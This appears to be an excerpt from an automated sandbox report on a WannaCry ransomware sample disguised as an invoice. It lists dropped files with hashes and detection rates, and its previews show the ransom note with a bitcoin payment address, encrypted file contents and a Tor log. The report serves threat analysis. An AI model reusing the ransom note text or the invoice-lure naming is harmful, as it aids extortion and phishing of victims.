                                                          SHA-512:6A465B3AFC6E9F21108A269FF5095FEA74C878AE8F98AF3458A5F65C78725B53283EF83B6C6C723B48994806FF56CD9765B77807FB6FE93659DD1579032EB6FE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.84304937150061
                                                          Encrypted:false
                                                          SSDEEP:24:bk0P2FgTlLVo+jVVnTnFr+BjWrC4i6nZ1s3oKB7WQeXxRXqm6Ys+f6:bkk2FMnTYBjj4i2s48R6IBK6
                                                          MD5:8E222719D9B1F91EF65A423AB4798461
                                                          SHA1:082606622DF199DF1DAF028DCFC01B22060011B6
                                                          SHA-256:B8DF46D262C3E85557C52FFD3CB4B133718A83F45D7EA2DBE71A16EA482C2381
                                                          SHA-512:F971633CE270BCBECC9BD8FAE7A858AD85880B6BD1C559E358461341F64FFB53667A7C7577482CCB01EDA9187B6022014A11055AD6F46887D6B909DD227DCC69
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.7934136993049234
                                                          Encrypted:false
                                                          SSDEEP:24:Zx18eP+SY6u6RMN9u9jkuAp/6Sxn8o9paG4RYGIOWpyMch:vtmSY6qN9u94uAl6Gn8GaG4RpxKyMch
                                                          MD5:CA84C077B82EA5A847AB245EA15728F7
                                                          SHA1:6B0B9D8B6F34EEE3739FF856A7636C8FDF0213C8
                                                          SHA-256:5563E2FE5F9A991636E46BBA70783A89362480763E0C69EA0EC62337C73877A9
                                                          SHA-512:B6F979148723EFAB947A01970A405F14052C3B24BD19620123E9EDF46EF8527BBC3CF1F4AF35F70EF060CAF8995C9D3A8C0F58791C62D22D88CCCA087D11D66C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8404481728894595
                                                          Encrypted:false
                                                          SSDEEP:24:bkfd936CaatBU3sageBh8ZbDUBFndsZFTTYHAB5u5MZlvbMnxzsl:bkF936FatK3sVewZbITnaZFT+ABw5MZ5
                                                          MD5:027D76AB9E12422D06107E1E2296EF75
                                                          SHA1:C4E74B81EB1BF0F8E0E8FED9439F3C2B8777D51A
                                                          SHA-256:BA9EACC218D8201722592E7D38A19EF5CF5D461C7206527E534D42AE7A86DBD3
                                                          SHA-512:13FF9E1ABC29CF009F650C23F280C51C88FB45F7280369A36B9EC6615D9F41EB137D9016687A5D62C6EC9E0C4077886853BB040A1FB4ACE3653D155CA51F2BA8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):245760
                                                          Entropy (8bit):6.278920408390635
                                                          Encrypted:false
                                                          SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                          MD5:7BF2B57F2A205768755C07F238FB32CC
                                                          SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                          SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                          SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          • Antivirus: Virustotal, Detection: 90%, Browse
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.840510355900618
                                                          Encrypted:false
                                                          SSDEEP:24:bkgg+826iFGcvoUNvBO8kmA2g3bxAsUVhPlFnk/A8ixnQR0VV1cvvnKxun:bkbHL+GPsvBO8kf3lYDk/BR0VMnKxu
                                                          MD5:CF157B4F50567E9B34B758393BE86D33
                                                          SHA1:F01F16B1AA368C0DD3F2620D05201D27EA7FEE90
                                                          SHA-256:9030B7EB2DF682D7ABCBA50D71C0424AFEC8CD3ED3CB8911EF680526B4BECA9F
                                                          SHA-512:07735EADF556B0DF5EE21A649469E07BDDD88C0E68DCE60739D91FB6F6033E06F7D39B7C8F050CD0A3B1C5022ACB60086499595E240DB6BC28CF5494325A3A18
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8613432302590045
                                                          Encrypted:false
                                                          SSDEEP:24:bk0zQTTXfQoKKzqD3U25AybqiZVMikJL33r2oB7GsbIDFTzmdVi1cs/rcmtVj:bk3Lf5qzHiIqpikJLHr2oB7GPTqdkLh
                                                          MD5:602B2D27385F3D34A8577B67901AAADC
                                                          SHA1:A81193F576194843326787FE251E1F22AC16DA6F
                                                          SHA-256:C4B993E18DCC53BADC2CA0FB614CC6D32E4BB36EF43177A1459EEA6656ECCAEF
                                                          SHA-512:2767CBB9A8416970C0D44F583129201E25215F035E698E366EDEE18DEA5B0C70E007E1587F52E424A687DF363E3338AE5E654687A7DE516DD61D01C7DF9B661E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.831682045151621
                                                          Encrypted:false
                                                          SSDEEP:24:bkA9A4IWPf8EUFmpbGl3e6MZrKRs9gMrqCUeZmvRsSaj5+oVkQdE7JCn:bkJ4BPf8LFmpgO6OryDMOCepsSaj55Vj
                                                          MD5:B2EBBBE9BF4B84EDC578B71AF2FA0DD9
                                                          SHA1:D2F615927C7857A559DFDEA23934F4AAD92B239C
                                                          SHA-256:26E659994D7829336F197F38DE351564E4A4CE11FBBB26545B43C3DE2ADF0EA4
                                                          SHA-512:BD7985387EC106EF40CC2FF8EB56BD873587F0322332B877000AD03D7C24D87A7D74F116C93E871B7D5B7503DCCB44493D809FAE34D7984E8ADC401640D6E308
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.865951896951833
                                                          Encrypted:false
                                                          SSDEEP:24:bkw1mgrZN3i21/Bq9G+34xcZ6mDau4Ck40BKTCQRV3tXCUxck:bkw13Pi2FBz+34xcxa3PHBKHRVlCUWk
                                                          MD5:0EAD69EAAC8E9B63A2410622673276C5
                                                          SHA1:55D1EBCF88470547140D662C8429B7B8BA52DA2A
                                                          SHA-256:94791D931FCD19E8AF3A51A21307844BE4DFE7B2314785B04EA0BCA919CF85A2
                                                          SHA-512:548D0BBFC02127B2EF479AD111B166276D6F744947234DA73489CB69609E1712B8E90931C26FD5BF5B5309250B15650BF42902857468BBE4F2240E2FFEDD91C9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....1"..............6.-...stCr.9j[.vi`.8..^w>.\.k..B'...1c.,.%.m....~..k'.P^...{..l .Zn3V.N7....{..e..<mf............*.1...X..#P6.....N..7.F.....%.9..9..7..o.Fwk.}..n......S..P%<.........G.,U;)..lQP"..v..q....3.\cDS..'1..X?.V.....n..R....@.v.CBaX...............hi.J%S..c..m..%...2.M...|].v......#..T.....=..jY.m..o......9pR....\....[.F;...P...#....L..!..;.R. .=.[\DO=....@....U.....N..z...Z.}J]....:5>h.()j.I.P..E.a..k.u.$.v>..ns...T..N...@8W...H...A..W.L7R[g....Z...U...n.#,....c........-...J_..d._.$Y-..:....(E5..!.Wm....mP..,.k2b<9miR..q.h-...$.n..N.K..-..~....G..%'+..#.LD!.]..........6XF.JQM.'-&..1..g.p.....6|L.....\.8..*%2..z..b.+.U.......fi.Ka.4$...9..N#..C.....IwJ..D/...k.F.+.....t.;t..X........,...6_.........^+0..z..A..O#D.........[.z..Va#c.e(6?.2.Y.`Q4a.H.R.}*..%....*..y.'.D..[....0...h+..GiHW.."......q.@...@7W.T.V.q...'...$8s.....D:.>*.....8......F.&#W-...b......q.{O%p.Fv.....I&........Z....w..{8..S..y.M;Pc.|...q.Ru...w.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.853909570516871
                                                          Encrypted:false
                                                          SSDEEP:24:bkIWMqFOTOGvJDh4VfZYUEDrjmuj47I0n3usTXciuP58Y/fPTWDvrgPMtB:bkIWMyeJDh4nk+y475Ai658YXPTWQPk
                                                          MD5:4E11A9B86C1CFB9AE41888E58CFBC8D4
                                                          SHA1:8B7D5BAF14C65E00668168A4709794F16DAC2C4F
                                                          SHA-256:96EDF10C8840EB3159DE96E64B52B4F10E0A646FBC149C858381E6154D543C4F
                                                          SHA-512:68877016CA1B76D0D7037C2028A291B9FA7F9BF88089BD01E726C8C23C89A546F8513BF03B4A7A2BC25778FF150273E183688BB8932056F6881D9A9348960E6F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....An."..'.0..t[..z.N..R.^"_...,MY.^t..a..4.b.5e.t...ghQ..3.,...j.6.Jz9...W{n:.D...k...].Z.....V...N..E...'...m+.;.].F.zyQ._..y2&.t....G.^%.j.A../y;.......V.k./...5..b....:^...{......_.iH...e..k.w{....If.8../.y.t..r.Bl.N......p..K6.dZ..0.C.S..............9.S...`.h!n...r.i..<....n*...j..4!n..i..B..rW=~D?)......l.........ki-.D......A2.DR#..N.Z..9.M...T5......G.+...O#w....j........p.y..Y.D..yn+...\4..'.Km..{......"t.]=n..........O'.?.e.j..N..?.~..e@..e.l.}Y%.B..$q..'..u.B..P.!..^._...>S.0..+..n1.x.M8....=1.0...;.=.....G..."....b.t.rP..".7..E.}.f...*.S.;..)K8#.....i.......Jf...I.n.Z..2l...Td.bd?.M.....Zwi6..[...'.............]..^..xw~..Q....:.^... .R7..=._.....,;..={..?^\......0......0.e.....O.8.i.&]..w..z."O....+=3.....P}..swn.VH.o.F.....;..DA.~.W...x<~1.ji.:(;I.......-.qpG].,0...g..g.5TN.a.."s...i.r......AU1..>.|...V{../.......&./=.m..K....F.....s-..2B....<.3."~.&9*.{......YP).......^:.._3+{C.n(x..S!..'...T. sQ...F.~....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8419130240363035
                                                          Encrypted:false
                                                          SSDEEP:24:bkQ2ub/0lTi2vLxpmCU7qq5l4Djl6UCAKL7IS64H/H62GpjToBnXAvjqhiaaIUh:bkJWAeExpmCU7qGlQ6F7l6ev62MIBOaA
                                                          MD5:806C028B3F03092667FDE7C5FBEDE241
                                                          SHA1:4BE9390B5F62D429C9123B4B763D285BDA5297AD
                                                          SHA-256:C5D6DA9805D6CCFFDC802472A6F32D60CDD36CBD8B699D6F912AA190095C4C9F
                                                          SHA-512:FC12B86C3B3586CA14DEE1A52957EE9FD5D185B3CF59611ACC8AFA0DB44B01A55AB1C97182E4B7C4D63135402DFEB6FDF17ACCA1E4535FF10A232ADD3FDC6550
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....,....Q.qB.>.J.5's..>..f....c..5"....x.I.....U...5....a9..nh...Y.z..;......3a...K..p$.~.[.... ..s[.B\0\O..`.G..9F1:.D..8.hB..q...l.9..qi....M....9m.{.b..L%D.q..W.8.iUj.&.._....*....`L.^.Rq...~.%.c.X.:..]X.Q"..../j'5.9^.,....4.1....m.N9..3y....[.h..............P...6.keU13U...P.:..8#Y...d.....Q..(.3..HB....p<!..o...'.7.._.@G.w...o`.Q.{..y.8e..<NZ=~.O.@..............<,.-..B../.}.:aq...k.......'.eG.^..7...<\.F..Ha;..|.e...$..R.......A.k.......h.!....<..%...7OL......l...q...._...p....F.B[.9........D.2;.@.,yH.....b,....0.6......1kO.?.}.39i....w.F?b..Xx:.T.{....g".95..Y.D.2.{e/+|]....BD.u..2...#.g.S... y..b..".. ^......s.......X.c.;..`"+..`..D..c._~.....7..^..xQ.9X.s.$....}..F..C.@....-.{^.%.0.....&.......'.&h0.WI.g..(.....c.a...^ {.NX).^.H...4+.S>Q(...=$%NVO.......Q7..V....V.l.).;....y.h.L&..;..._.*a.w....h...?....$BH2.UC..^.\.Z2H...S.....gQ....T...-."...`............&.e..0.........XW......r...M..vD.m...`.,w..a..z....32..^Z....VKc.b.y.-.r..~7;./
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.821325761019143
                                                          Encrypted:false
                                                          SSDEEP:24:bkARXDsVqfzbDDpkrFDQfSrgJDTE6A1Xu5cghwHldXOuukBM5bqznefA+Zmj4BAD:bkA5m+DNkrF4TEvXueDPYuafAAmUBAD
                                                          MD5:8F8F8EBC0B0ADCC731A6348ACC23CF15
                                                          SHA1:2479E037D6CEBC48465A0B0E5880B2276B3631AF
                                                          SHA-256:666203F8C6EBA71F58D721B9032C85700B4AC10A271503DDE2D1E290A0DB72C2
                                                          SHA-512:CD978A28F2E3C359C535BA5F5733F9C276122C8D662F8F3003F2AB6CC171021468B75EF53800F40C1E7CA14A0FF21CEE1A4894E8655EB9FAF928FCF9F4E2405E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....>?..V.....`./>.i..(.p...m(\..L."O.q.h.....W.K>.....L.%=ek...!....f0.. .c.........{.-...|;IL.7t.a.@.k9..\..hl..O...m.#..Y.z.~@r...l...r.<.'.....q....oQV..m....>.C..=R.c.Q.}3....iBAH..^k.......gs.R........UO1/.@h....`s...Q.;E.......P..?...(.b.n................V.2.....|....vakP.....Kao.% ...P....4R.o...az^..!B.O9...J...k.Ll......D .x8..`.M.2...X.L/ q.$.L.h......."...LMw..{....<.......S}./..p...~.8]....tX."O......`.J.....!.o..?.3....N.o*..!s.B32E.."O.Em.I(+..b..J..%.uo..xn..[...B.>+.fTat..c..;...e.V;Fxb.]....Z.}.l..'..Y$W..w.B.}.P.k6\...W.... qq..NA}.l.CSE30.:..#./!cW.$.a..o;.x.;.H.....dE._Z...!.q...Uq..V.o;...*..o."..bQ6O".V_...r....*#.!.(......\...M.H.."~*fQ.9.@.T}.t...D,.^..>.......}.......}r2C..5........u....r"z.$;.>xt.C.%zr.SX#<P.m.:...@....].R..VO2}UK......,*.A...&.t....<...v1e./<.!f.`R.....v..a.%..?.k..$Um...y46nHT.Y.;...V.Q.N.~*.....F=>V..vP...../%...L..@..I.V.I2C.uv..I...7....K1..k...../]bC..8.J.M..h.r.].].....n.4.q-w>7.[.`
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.844424890604193
                                                          Encrypted:false
                                                          SSDEEP:24:bkoTdTlnZvI8vKW9Gk5q87hx+Fs5Ij/KZIkw/Tq:bkQJ1I+KW9Geq876GIjSZZwbq
                                                          MD5:2FDFAE9BCAB03556176F8A8AC3BDD99E
                                                          SHA1:E894283D1BF6E12E01EE54499EDFAC1C8A5F7224
                                                          SHA-256:7828F845A8F25E07070E5E48EB08BDC0280E31F7446B594707A5122B347A770F
                                                          SHA-512:B2FD59D1F2D5720E1048E0853213565DE2DECBD4CED6F2814C1410ABDD4EA9B8BA1A6554AC23A58AD80A6033B247FDB1C4A120FFDBA02B1CA7C7E3CE53603889
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....M@......6a..}..:Ur<Y.ls_...9/.j..U.~....)`d..`....D9.KTLb0c.....W.D.....Y..&/...7...{.{.tO.].v."C...l*.A.R|&...z..6..K.J.'x+...~...y..z'...x-S..'1.+KR....$.OF.:Zn.*.......I.....B....V...."B...M....q.......w.!.....U.j8....c.....J..5.U.....X.D............|L.1[.v....@e.w...F........g....G...<......i...a.O.....Jr).%.`..o....m...........>.........y5..Mqc.Y.j..ObR..$.t..(.{S8.%B.n.f.$ff...g.*d.`i..[.5...xO.6..2.U.et.A.&..].5..q.....Z....$.2z.M~..e..v..e..:.aD..Q..i.K.q.~G.'Bt.....p{1w.....`..K..h..a.W.c:...0i.O.1x".@,.8..K.]..q..e...Cp"AU@..'b.kY...M..S.P..K..Gv.......'7..Yd......,..c.....c9J,...U...Z0m....GN..h:v.D.y...L...........>...P.T)>GH..0N2&.^|.!p........m...7uZ...E...:.....{ .Qn.....a"..w5@V...%.8.q.....}Yk.]^..9..b...:..i)....g...j............O.?z..ms..S..|..Rj>;.+N..]...$..T.../...^AG..........T.....&../.Y......kG.RPtX....t.+?.p..&4...u?.-S...I'..H7.......&j.x*.v.=.il...E..[..^....9...C.M9T..^r..-.;.o.lo,1.H...y2.....|..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.851984951275298
                                                          Encrypted:false
                                                          SSDEEP:24:bkfaenHucELCMVs4XNiYNsu7wTZok6fcegeObvoHDDnBUTSHgcycBg+khw6au5d:bkfaeHvsdvNspOk6fce3kojDB39Rz6ac
                                                          MD5:D1BA2213569ACDBC009971DD2BE961E0
                                                          SHA1:7435D826E34DAEFB28FCF065347F6D6A42C9EF67
                                                          SHA-256:A623B6F2CF0BDF4A55ECD330271F8FFE774C207F3B0855F22B473814E99E3977
                                                          SHA-512:E72BD30FA8484A72BCC9A3E7D585C0CA8D7974DFC38F261A8C7046170C81CF334F50EF2B0CB5D4B07484128FAC67E7114E20F86A992BF40DE14319DADCDB80E6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........x.9|p...x.1..[Q?..C..)z...<..]..Ig#r.?.C.xk....Y.y..($w4..._gUvu.wz.U...Y\..z...plp"K..>.N.....|xM.S.-.*..gS....q...Y.\(+/...3......=...4......1a1D..^1.E.aU...X.....v...r.;.......@u..0.m.>6X...1.l..<^C2..V...x.D.O.%.`........7G......8............r(.Iq..r.j>.N.7...n2..L._.(."...i......?.*......F..m.<jS.e.p..3!...h.I....4..Rt...H:.L....a.DS....=l]..(.}.j.6/"..9....JUX.9\.....=......{,.R;.6.|xq&....2.......|g......t= ;.I...g................2.BV...^..k....b.....`..`]........7.b./E7JK.Y5...~...C:..<..x.9"`.~....=..UMC.&pR..3K.&..g...Ka....I.R....mj...P...............D3$j.e..v.E...u..5a.....v-...W.z........d5..e.......$..l.~.AE..4Oga.'...C.f^.q..7..Go.O.`...8^.be.< ..C...lE'....V... )..|j.......6..Y/...D1.G;.{..w...u....(Lj p.b:..!4.<.n.........&%d.....>...f.Q..$.'.k.....|oO..;...MO.......i...4..Z...U6.G./..G....:..._..M...x.Ed.........MZ........2....#Y.F.....8w..j.:7..:.Z..?.P^.......<./..d.x..(<.})......u...b2
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8393141280330125
                                                          Encrypted:false
                                                          SSDEEP:24:bkIKpMbqOffnB2uRP2wWmNJlMiFCCzAgRgZdHF54tTtjBJNd62R29i0un:bkI4MWO3BzeEVF9lgzFCTtVJBR2c0un
                                                          MD5:58A20BEF24C23E80E38F3009814428A7
                                                          SHA1:A302CC8C7CB9BA819CA23094B34E1B89B666620B
                                                          SHA-256:6C7C6FA17DC7C8A5EF142AE1F3539624620D12EB2752C78A0E88CA5EABC1C844
                                                          SHA-512:B556039424323C88ABAC07226517F5EB5A2C1EAFE74E51A716C69C1BC861090FB7915220CE3B5326657328D17081B43E9124B14773B8AAECFE4356B0D9315D2C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....N.TXv!1..h`.Z.J../....V....b..(m.<S..SME.#........A......O...!...$.-..^.....?.@..%..G|.kD..]?o..9.$.CZ&w.Wg.......y.X.%.<.+.qG..w..@=MHH.4:.4#.......n....J+.F.u.F..~.n.....6}[}2.d..:..D.E..1:...1...s.r.....C.p....HK..........C.s.RC..1!`O..................^..p...&..`.......".m8.\.....g......9E..'k.....Hr...gjn.c.:.....h.._z.B..........{Z.? w.[..z.._......k..z.....\=z..BVu.96.....B...zN.uOt.....J.?.t;.x>z.0,...h.....#H. <.d.........C..F.Ni.....V..'rB^..#..n.t.S....3Q>...s.........z[.D.......ut3.la......g.n....O.f..y...!1.2.......f.....:...?........s![.q*..ZQ.'.1..v5.f..g.4z.g..PlA....u.~..U.V...V.)....}H.4t..@.-.a...#Z-..-8.G.\p.7.....O..IXp..~E.{...:.n.9P.d....~..cJJkwq^W.............?.P....;.q.r#.H.m.n.&...h.=yr}./....<ws.U...i.[.N.......SRpQ......s.`..}]P....S......]d.7.t..q........9.{.'.....N.b.zz.".....\..#.._w.BT........4....}.0v~2.:..~.b...H.S..2..;..='.;V..qy.Qr'./..p-.......t...@I\...M.7.c.._.`d...OF......gO.X..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.853794139678357
                                                          Encrypted:false
                                                          SSDEEP:24:bk40XWvby2kqL5X7iIjjfG9dHKjF6czbt9a4zzv0AuTXu/31f3AD8ScxkyRAVL+:bk4oebplrrursF6shxzzNgX6x3AA3xhl
                                                          MD5:556133CCDEC3A0B9EA801E84F5ABA51D
                                                          SHA1:2C973AFE22AB1AF16E27240932DCEDE887E4AEA7
                                                          SHA-256:927D706EB4E956ADEF075E953B289A13CE89BB4EFF12E72CCE10C94F50A1DF2F
                                                          SHA-512:F90FD7DE13C2CF184A4DBEAB768081A23172DD6B6257796465454BC7C66844552C26D80FB61FA9554A5BE1EA31939530047DFD6085D34321B97316836D4ACD92
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....)..R......%..<.7.(GUp....;...HP.5O(........1...:>%.+..;a....V.s.L....j..i..B.eu&...nh..t.Yk..../X.............H.....A]x..P..MLo.,$.sA.."P...j+.L.....I.y.$..U/....A.*I.$...#..3ON....s.X....(.......a%.o;j.._#&*.......xJ.....4.B....C.I..>..............{.}.....".!C.. S._.OZ..)..W....Un/6...-.......5G..@.H(....KF..T..(e...@.dr......^Q.....W .......?...].0`2F^9g.P..A.d....Pc.w*.7.T...m.7.H.h...J)..f.....u..a....D.]..lW.y...-..H....].`......2.v(....:.yJ&..W.4u;&...HR...%6F...#.$...v.[..[..RPNR.HK....&/.N.....".>..Zj..ka{..9D..4..b.K......~.x...T.F.b4....uU..x...B..aF.#.&.....".}3.=ot.|.B.....6L..@cm/;..Q.v[GE...(....m...:.}a.C...]s..-.....@*.o...?....fW.l.[.5...pRW...m..(')....EY..M......._4.a#...+...Qh....$m...Hp.e..A....R'...'.S9R...K..\:i..a.!g.}0...}....F..t:...6.G..&..=@.....\.........r....h...'j..`.SU.l._..L&...#.m...R.+r.P...2..\....d..}.'}..}........4.b.B0.Z......g..gE..Q|.w...j.C.g..`...m..h....5Fev..T.k.....+".....l.b..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834077587763993
                                                          Encrypted:false
                                                          SSDEEP:24:bkf+zD3RoCmO4K2g4a02X93j6+rUZJ00L/lxD8B+FaX4PlopN7269Sj:bkiTRoCmJBablj6+r+F/l18BjPpN7Bkj
                                                          MD5:C22FDB40A47E41B5B1F21C0C05DA97CE
                                                          SHA1:F2BC6658379F3127045DD491C1D5352430762165
                                                          SHA-256:631167DFFA29E5DE97CF6C26F1226F622E8D318E4723DCC40474F5793B247501
                                                          SHA-512:DDCF800682C9CA5DAE005E1232E924A9E1DA3D1A2EC516F4AF3B8FDB59517F187A0C54CFE53582F047F96E7783EA22586EFB6ABDD7DD6004695BBB50F4EC03F5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....#3.z5...v.[Y..V.BEc...x.....&*q.9>X.........`.P.Ml.C..6g S..Iq..;..1.cuN.v.......T...MQ.y]..Z.y."5.K_.h...,{...";.Z^...=}9Y..r..v.e.yE.%.z!...|H.e..M.[.P.bKQ.?h.G.a3....S.V.4...#....<~...Q`....`.+...V...F.W.hp...9V...(.o"..V.{.S.w.}<X.....6.*m............9..NP.E...........%.........z..b%E.<..... .TU..w3.Y..L...s.z. 3.....2.g(..nn?..a.@.*d.b.79\E..H60.<L...5...\.<....@.F. +..'..1..]...x.r..~..l.....6d..w.....N.D.v.`b>\&.}.{.*....`.{...g.x....$..'...T....`>;..>.m.U......^w..D..cTUK......}........4t..S.%h.6....X..(}9......u..D..(.'m...V.V.!.%..Ew)..7E8.4\t!t...B......=f<.. ....b.....B~.!9a.........7i..2.j..N....g. aw.]......lw..Z.3.z..`..../.j...1=,.6.E..!M..>tA.V...Jl.pq..........4..\].-mB..N.v..lc....s..U.>..s.m.i.E...X.P..y[...w.;..._.=o..&E.p.i.4.+D...=#R...L....b.....5.(ux..4...Iv.P..j......(..O'..dT...\....r_.<......s....|...`...t......M..(........R9\M...{.P.+.c.9...6.5p.5...'..+..\G...]......oL<V..7.7...gU....o....?|3...y U
                                                          Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):2321
                                                          Entropy (8bit):5.0572825471537115
                                                          Encrypted:false
                                                          SSDEEP:48:1vKpfYxmD9mgYU+JkAcS5AFij0F7Fm8b4pc8qQD2USEI28k/jwj:YhYuSVqQd5aj
                                                          MD5:DD283A3B632CE60BC45465AEA6DC75E9
                                                          SHA1:377D22F66984CAF855008E44883E17949FCE6213
                                                          SHA-256:CB51C7EA98EF1B9E62DA1D0712003A923959CE3F7354844C83E1801FA4C351C5
                                                          SHA-512:A609D8353332396FB88265B326EABF3783CF96B95B3B6B3C372ED69DEE6FED5525DC7215388D06F3EA02BBAD3E46784CECA5F52461A219B2CB0E8FEFCF1B8138
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Jan 16 11:59:43.329 [notice] Tor 0.2.9.10 (git-1f6c8eda0073f464) running on Windows 8 with Libevent 2.0.22-stable, OpenSSL 1.0.2k and Zlib 1.2.8...Jan 16 11:59:43.345 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning..Jan 16 11:59:43.536 [notice] Configuration file "C:\Users\user\AppData\Roaming\tor\torrc" not present, using reasonable defaults...Jan 16 11:59:43.551 [warn] Path for GeoIPFile (<default>) is relative and will resolve to C:\Users\user\Desktop\<default>. Is this what you wanted?..Jan 16 11:59:43.551 [warn] Path for GeoIPv6File (<default>) is relative and will resolve to C:\Users\user\Desktop\<default>. Is this what you wanted?..Jan 16 11:59:43.551 [notice] Opening Socks listener on 127.0.0.1:9050..Jan 16 11:59:43.000 [notice] Bootstrapped 0%: Starting..Jan 16 11:59:45.000 [notice] Bootstrapped 5%: Connecting to directory server..Jan 16 11:59:45.000 [notice] Bootstrapped 10%: Finishing handshake wit
                                                          File type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
